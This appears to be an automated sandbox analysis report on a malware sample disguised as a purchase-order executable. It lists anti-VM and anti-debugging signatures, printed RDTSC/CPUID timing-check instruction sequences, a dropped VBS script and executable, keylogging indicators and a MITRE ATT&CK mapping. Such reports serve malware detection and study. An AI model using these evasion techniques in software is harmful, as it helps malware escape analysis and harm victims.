Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00562387		2_2_00562387
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005623A6		13_2_005623A6

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 0000000000563162 second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+000000A0h] 0x00000010 mov edx, AC928EF4h 0x00000015 call 00007F1880CC5769h 0x0000001a jmp 00007F1880CC4242h 0x0000001c test cl, 00000039h 0x0000001f push esi 0x00000020 jmp 00007F1880CC4242h 0x00000022 cmp dx, ax 0x00000025 push edx 0x00000026 jmp 00007F1880CC4242h 0x00000028 pushad 0x00000029 lfence 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 000000000056322C second address: 000000000056322C instructions:
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 0000000000563162 second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+000000A0h] 0x00000010 mov edx, AC928EF4h 0x00000015 call 00007F1880CC5769h 0x0000001a jmp 00007F1880CC4242h 0x0000001c test cl, 00000039h 0x0000001f push esi 0x00000020 jmp 00007F1880CC4242h 0x00000022 cmp dx, ax 0x00000025 push edx 0x00000026 jmp 00007F1880CC4242h 0x00000028 pushad 0x00000029 lfence 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 000000000056322C second address: 000000000056322C instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SBG-1100319PurchaseOrder.exe, filename1.exe, filename1.exe, 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 000000000223033D second address: 00000000022346F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F1880CC92A9h 0x00000010 jmp 00007F1880CC4246h 0x00000012 test dh, bh 0x00000014 jmp 00007F1880CC4246h 0x00000016 cmp al, 27h 0x00000018 cmp ch, bh 0x0000001a test bh, dh 0x0000001c cmp cx, dx 0x0000001f nop 0x00000020 mov eax, 00000539h 0x00000025 mov ecx, dword ptr [ebp+1Ch] 0x00000028 mov edx, 8802EDACh 0x0000002d call 00007F1880CC34DAh 0x00000032 jmp 00007F1880CC4242h 0x00000034 test cl, 00000039h 0x00000037 push esi 0x00000038 jmp 00007F1880CC4242h 0x0000003a cmp dx, ax 0x0000003d push edx 0x0000003e jmp 00007F1880CC4242h 0x00000040 pushad 0x00000041 lfence 0x00000044 rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 00000000022346F2 second address: 0000000002234756 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F1880CB64F2h 0x0000000e test ch, bh 0x00000010 jmp 00007F1880CB64F6h 0x00000012 test cl, bl 0x00000014 cmp eax, 00000539h 0x00000019 jne 00007F1880CB65E9h 0x0000001f push 6DDB9555h 0x00000024 jmp 00007F1880CB64F6h 0x00000026 pushad 0x00000027 mov edx, 00000015h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 00000000022348F1 second address: 0000000002234988 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add eax, ebx 0x00000005 mov ebx, dword ptr [eax+78h] 0x00000008 jmp 00007F1880CC4242h 0x0000000a cmp eax, ebx 0x0000000c mov eax, dword ptr [ebp+04h] 0x0000000f add eax, ebx 0x00000011 mov ecx, dword ptr [eax+18h] 0x00000014 jmp 00007F1880CC4242h 0x00000016 test ecx, edx 0x00000018 mov dword ptr [ebp+08h], ecx 0x0000001b jmp 00007F1880CC4242h 0x0000001d test ch, bh 0x0000001f mov ecx, dword ptr [eax+1Ch] 0x00000022 mov dword ptr [ebp+14h], ecx 0x00000025 jmp 00007F1880CC4246h 0x00000027 test cl, bl 0x00000029 mov ecx, dword ptr [eax+24h] 0x0000002c mov dword ptr [ebp+10h], ecx 0x0000002f mov esi, dword ptr [eax+20h] 0x00000032 add esi, dword ptr [ebp+04h] 0x00000035 xor ecx, ecx 0x00000037 jmp 00007F1880CC4246h 0x00000039 pushad 0x0000003a mov edx, 0000002Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 000000000056033D second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F1880CBB559h 0x00000010 jmp 00007F1880CB64F6h 0x00000012 test dh, bh 0x00000014 jmp 00007F1880CB64F6h 0x00000016 cmp al, 27h 0x00000018 cmp ch, bh 0x0000001a test bh, dh 0x0000001c cmp cx, dx 0x0000001f nop 0x00000020 mov eax, 00000539h 0x00000025 mov ecx, dword ptr [ebp+1Ch] 0x00000028 mov edx, 8802EDACh 0x0000002d call 00007F1880CB578Ah 0x00000032 jmp 00007F1880CB64F2h 0x00000034 test cl, 00000039h 0x00000037 push esi 0x00000038 jmp 00007F1880CB64F2h 0x0000003a cmp dx, ax 0x0000003d push edx 0x0000003e jmp 00007F1880CB64F2h 0x00000040 pushad 0x00000041 lfence 0x00000044 rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 00000000005646F2 second address: 0000000000564756 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F1880CC4242h 0x0000000e test ch, bh 0x00000010 jmp 00007F1880CC4246h 0x00000012 test cl, bl 0x00000014 cmp eax, 00000539h 0x00000019 jne 00007F1880CC4339h 0x0000001f push 6DDB9555h 0x00000024 jmp 00007F1880CC4246h 0x00000026 pushad 0x00000027 mov edx, 00000015h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 00000000005648F1 second address: 0000000000564988 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add eax, ebx 0x00000005 mov ebx, dword ptr [eax+78h] 0x00000008 jmp 00007F1880CB64F2h 0x0000000a cmp eax, ebx 0x0000000c mov eax, dword ptr [ebp+04h] 0x0000000f add eax, ebx 0x00000011 mov ecx, dword ptr [eax+18h] 0x00000014 jmp 00007F1880CB64F2h 0x00000016 test ecx, edx 0x00000018 mov dword ptr [ebp+08h], ecx 0x0000001b jmp 00007F1880CB64F2h 0x0000001d test ch, bh 0x0000001f mov ecx, dword ptr [eax+1Ch] 0x00000022 mov dword ptr [ebp+14h], ecx 0x00000025 jmp 00007F1880CB64F6h 0x00000027 test cl, bl 0x00000029 mov ecx, dword ptr [eax+24h] 0x0000002c mov dword ptr [ebp+10h], ecx 0x0000002f mov esi, dword ptr [eax+20h] 0x00000032 add esi, dword ptr [ebp+04h] 0x00000035 xor ecx, ecx 0x00000037 jmp 00007F1880CB64F6h 0x00000039 pushad 0x0000003a mov edx, 0000002Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 0000000000563162 second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+000000A0h] 0x00000010 mov edx, AC928EF4h 0x00000015 call 00007F1880CC5769h 0x0000001a jmp 00007F1880CC4242h 0x0000001c test cl, 00000039h 0x0000001f push esi 0x00000020 jmp 00007F1880CC4242h 0x00000022 cmp dx, ax 0x00000025 push edx 0x00000026 jmp 00007F1880CC4242h 0x00000028 pushad 0x00000029 lfence 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	RDTSC instruction interceptor: First address: 000000000056322C second address: 000000000056322C instructions:
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 00000000021C033D second address: 00000000021C46F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F18804EC169h 0x00000010 jmp 00007F18804E7106h 0x00000012 test dh, bh 0x00000014 jmp 00007F18804E7106h 0x00000016 cmp al, 27h 0x00000018 cmp ch, bh 0x0000001a test bh, dh 0x0000001c cmp cx, dx 0x0000001f nop 0x00000020 mov eax, 00000539h 0x00000025 mov ecx, dword ptr [ebp+1Ch] 0x00000028 mov edx, 8802EDACh 0x0000002d call 00007F18804E639Ah 0x00000032 jmp 00007F18804E7102h 0x00000034 test cl, 00000039h 0x00000037 push esi 0x00000038 jmp 00007F18804E7102h 0x0000003a cmp dx, ax 0x0000003d push edx 0x0000003e jmp 00007F18804E7102h 0x00000040 pushad 0x00000041 lfence 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 00000000021C46F2 second address: 00000000021C4756 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F1880CB64F2h 0x0000000e test ch, bh 0x00000010 jmp 00007F1880CB64F6h 0x00000012 test cl, bl 0x00000014 cmp eax, 00000539h 0x00000019 jne 00007F1880CB65E9h 0x0000001f push 6DDB9555h 0x00000024 jmp 00007F1880CB64F6h 0x00000026 pushad 0x00000027 mov edx, 00000015h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 00000000021C48F1 second address: 00000000021C4988 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add eax, ebx 0x00000005 mov ebx, dword ptr [eax+78h] 0x00000008 jmp 00007F1880CC4242h 0x0000000a cmp eax, ebx 0x0000000c mov eax, dword ptr [ebp+04h] 0x0000000f add eax, ebx 0x00000011 mov ecx, dword ptr [eax+18h] 0x00000014 jmp 00007F1880CC4242h 0x00000016 test ecx, edx 0x00000018 mov dword ptr [ebp+08h], ecx 0x0000001b jmp 00007F1880CC4242h 0x0000001d test ch, bh 0x0000001f mov ecx, dword ptr [eax+1Ch] 0x00000022 mov dword ptr [ebp+14h], ecx 0x00000025 jmp 00007F1880CC4246h 0x00000027 test cl, bl 0x00000029 mov ecx, dword ptr [eax+24h] 0x0000002c mov dword ptr [ebp+10h], ecx 0x0000002f mov esi, dword ptr [eax+20h] 0x00000032 add esi, dword ptr [ebp+04h] 0x00000035 xor ecx, ecx 0x00000037 jmp 00007F1880CC4246h 0x00000039 pushad 0x0000003a mov edx, 0000002Eh 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 000000000056033D second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F1880CBB559h 0x00000010 jmp 00007F1880CB64F6h 0x00000012 test dh, bh 0x00000014 jmp 00007F1880CB64F6h 0x00000016 cmp al, 27h 0x00000018 cmp ch, bh 0x0000001a test bh, dh 0x0000001c cmp cx, dx 0x0000001f nop 0x00000020 mov eax, 00000539h 0x00000025 mov ecx, dword ptr [ebp+1Ch] 0x00000028 mov edx, 8802EDACh 0x0000002d call 00007F1880CB578Ah 0x00000032 jmp 00007F1880CB64F2h 0x00000034 test cl, 00000039h 0x00000037 push esi 0x00000038 jmp 00007F1880CB64F2h 0x0000003a cmp dx, ax 0x0000003d push edx 0x0000003e jmp 00007F1880CB64F2h 0x00000040 pushad 0x00000041 lfence 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 00000000005646F2 second address: 0000000000564756 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F1880CC4242h 0x0000000e test ch, bh 0x00000010 jmp 00007F1880CC4246h 0x00000012 test cl, bl 0x00000014 cmp eax, 00000539h 0x00000019 jne 00007F1880CC4339h 0x0000001f push 6DDB9555h 0x00000024 jmp 00007F1880CC4246h 0x00000026 pushad 0x00000027 mov edx, 00000015h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 00000000005648F1 second address: 0000000000564988 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add eax, ebx 0x00000005 mov ebx, dword ptr [eax+78h] 0x00000008 jmp 00007F1880CB64F2h 0x0000000a cmp eax, ebx 0x0000000c mov eax, dword ptr [ebp+04h] 0x0000000f add eax, ebx 0x00000011 mov ecx, dword ptr [eax+18h] 0x00000014 jmp 00007F1880CB64F2h 0x00000016 test ecx, edx 0x00000018 mov dword ptr [ebp+08h], ecx 0x0000001b jmp 00007F1880CB64F2h 0x0000001d test ch, bh 0x0000001f mov ecx, dword ptr [eax+1Ch] 0x00000022 mov dword ptr [ebp+14h], ecx 0x00000025 jmp 00007F1880CB64F6h 0x00000027 test cl, bl 0x00000029 mov ecx, dword ptr [eax+24h] 0x0000002c mov dword ptr [ebp+10h], ecx 0x0000002f mov esi, dword ptr [eax+20h] 0x00000032 add esi, dword ptr [ebp+04h] 0x00000035 xor ecx, ecx 0x00000037 jmp 00007F1880CB64F6h 0x00000039 pushad 0x0000003a mov edx, 0000002Eh 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 0000000000563162 second address: 00000000005646F2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp+000000A0h] 0x00000010 mov edx, AC928EF4h 0x00000015 call 00007F1880CC5769h 0x0000001a jmp 00007F1880CC4242h 0x0000001c test cl, 00000039h 0x0000001f push esi 0x00000020 jmp 00007F1880CC4242h 0x00000022 cmp dx, ax 0x00000025 push edx 0x00000026 jmp 00007F1880CC4242h 0x00000028 pushad 0x00000029 lfence 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	RDTSC instruction interceptor: First address: 000000000056322C second address: 000000000056322C instructions:

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Code function: 0_2_02235232 rdtsc

0_2_02235232

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe TID: 6804	Thread sleep count: 81 > 30			Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe TID: 6804	Thread sleep time: -40500s >= -30000s			Jump to behavior

Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502105694.0000000000929000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWXV
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502196213.000000000095A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWdwebpl
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502196213.000000000095A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: SBG-1100319PurchaseOrder.exe, filename1.exe, filename1.exe, 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe

Code function: 13_2_00560500 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000

13_2_00560500

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Code function: 0_2_02235232 rdtsc

0_2_02235232

Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe

Code function: 13_2_005638AC LdrInitializeThunk,

13_2_005638AC

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_0223465F mov eax, dword ptr fs:[00000030h]	0_2_0223465F
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02231EEC mov eax, dword ptr fs:[00000030h]	0_2_02231EEC
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02231ED8 mov eax, dword ptr fs:[00000030h]	0_2_02231ED8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02232ADD mov eax, dword ptr fs:[00000030h]	0_2_02232ADD
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02231F14 mov eax, dword ptr fs:[00000030h]	0_2_02231F14
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02234FA8 mov eax, dword ptr fs:[00000030h]	0_2_02234FA8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02231C8F mov eax, dword ptr fs:[00000030h]	0_2_02231C8F
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00565810 mov eax, dword ptr fs:[00000030h]	2_2_00565810
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056465F mov eax, dword ptr fs:[00000030h]	2_2_0056465F
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00562AC6 mov eax, dword ptr fs:[00000030h]	2_2_00562AC6
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005657DC mov eax, dword ptr fs:[00000030h]	2_2_005657DC
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005657C0 mov eax, dword ptr fs:[00000030h]	2_2_005657C0
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00565787 mov eax, dword ptr fs:[00000030h]	2_2_00565787
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056578A mov eax, dword ptr fs:[00000030h]	2_2_0056578A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00564FA8 mov eax, dword ptr fs:[00000030h]	2_2_00564FA8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C465F mov eax, dword ptr fs:[00000030h]	12_2_021C465F
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C2ADD mov eax, dword ptr fs:[00000030h]	12_2_021C2ADD
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C1ED8 mov eax, dword ptr fs:[00000030h]	12_2_021C1ED8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C1EEC mov eax, dword ptr fs:[00000030h]	12_2_021C1EEC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C1F14 mov eax, dword ptr fs:[00000030h]	12_2_021C1F14
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C4FA8 mov eax, dword ptr fs:[00000030h]	12_2_021C4FA8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C1C8F mov eax, dword ptr fs:[00000030h]	12_2_021C1C8F
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00561ED8 mov eax, dword ptr fs:[00000030h]	13_2_00561ED8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565787 mov eax, dword ptr fs:[00000030h]	13_2_00565787
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565810 mov eax, dword ptr fs:[00000030h]	13_2_00565810
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00561C8F mov eax, dword ptr fs:[00000030h]	13_2_00561C8F
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056465F mov eax, dword ptr fs:[00000030h]	13_2_0056465F
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00562ADD mov eax, dword ptr fs:[00000030h]	13_2_00562ADD
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00561EEC mov eax, dword ptr fs:[00000030h]	13_2_00561EEC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00561F14 mov eax, dword ptr fs:[00000030h]	13_2_00561F14
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056171F mov eax, dword ptr fs:[00000030h]	13_2_0056171F
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005657DC mov eax, dword ptr fs:[00000030h]	13_2_005657DC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005657C0 mov eax, dword ptr fs:[00000030h]	13_2_005657C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056578A mov eax, dword ptr fs:[00000030h]	13_2_0056578A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00564FA8 mov eax, dword ptr fs:[00000030h]	13_2_00564FA8

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process created: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Jump to behavior

Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502461561.0000000000FA0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502175655.000000000094A000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502461561.0000000000FA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502461561.0000000000FA0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp, logs.dat.2.dr	Binary or memory string: [ Program Manager ]
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502461561.0000000000FA0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp	Binary or memory string: Program Managerk\AppData\Local\Temp\subfolder1\filename1.vbs

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture111	Security Software Discovery721	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
